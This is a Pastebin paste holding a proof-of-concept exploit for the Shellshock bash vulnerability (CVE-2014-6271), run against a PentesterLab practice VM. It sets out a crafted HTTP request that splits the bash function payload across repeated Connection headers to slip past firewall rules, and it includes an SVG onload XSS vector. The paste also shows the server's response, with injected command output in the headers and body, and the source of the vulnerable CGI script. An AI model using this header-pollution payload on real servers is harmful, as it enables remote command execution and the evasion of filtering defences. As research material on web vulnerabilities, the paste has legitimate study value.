Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ~~ cve-2014-6271 PoC by Using HTTP Header Pollution (HHP) to Bypass Some Firewall Rules ~~
- By Soroush Dalili (@irsdl)
- Based on a vulnerable sample - VM downloadable from http://files.pentesterlab.com/cve-2014-6271/cve-2014-6271.iso
- Note 1: Space characters are important
- Note 2: It can hide some other vectors such as "'<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('1')' '>' " - just interesting
- Note 3: Look at the request "<<WHY? Look @ ENV>> " and its response "Look @ ENV >> , <<WHY? & WHY?" - also interesting
- Note 4: Didn't have any actual live firewall to test this on a live product!!!
- [Request:]
- ------------
- GET /cgi-bin/status HTTP/1.1
- HOST: test
- Connection:
- ()
- {<<WHY? Look @ ENV>>
- abcd: A
- Connection: &};echo "
- abcd: B
- Connection: GoesToResponseBody"'<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('1')' '>' "
- abcd: C
- Connection: "&echo
- -e "GoesToResponseHeader\x3a@IRSDL"
- ------------
- [Response:]
- ------------
- HTTP/1.1 200 OK
- Date: Fri, 26 Sep 2014 00:51:50 GMT
- Server: Apache/2.2.21 (Unix) DAV/2
- GoesToResponseHeader: @IRSDL
- Content-Type: application/json
- Content-Length: 859
- , GoesToResponseBody<svg onload=alert(1) > ,
- { "uptime": " 00:51:50 up 12:09, 1 users, load average: 0.00, 0.01, 0.04", "kernel": "Linux vulnerable 3.14.1-pentesterlab #1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux"}
- SERVER_SIGNATURE= HTTP_ABCD=A, B, C UNIQUE_ID=VCS4pn8AAAEAAANqBIIAAACU SERVER_PORT=80 HTTP_HOST=test DOCUMENT_ROOT=/var/www/ SCRIPT_FILENAME=/var/www/cgi-bin/status REQUEST_URI=/cgi-bin/status SCRIPT_NAME=/cgi-bin/status REMOTE_PORT=38403 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/usr/sbin:/bin:/usr/bin PWD=/var/www/cgi-bin SERVER_ADMIN=louis@pentesterlab.com REMOTE_ADDR=192.168.1.1 SHLVL=1 SERVER_NAME=test SERVER_SOFTWARE=Apache/2.2.21 (Unix) DAV/2 QUERY_STRING= SERVER_ADDR=192.168.1.132 GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.1 REQUEST_METHOD=GET HTTP_CONNECTION=() { Look @ ENV >> , <<WHY? & WHY? } _=/usr/bin/env
- ------------
- [cgi-bin/status source code:]
- ------------
- #!/bin/bash
- echo "Content-Type: application/json";
- echo ""
- echo '{ "uptime": "'`uptime`'", "kernel": "'`uname -a`'"} '
- # the rest added
- echo ""
- echo $(env)
- ------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement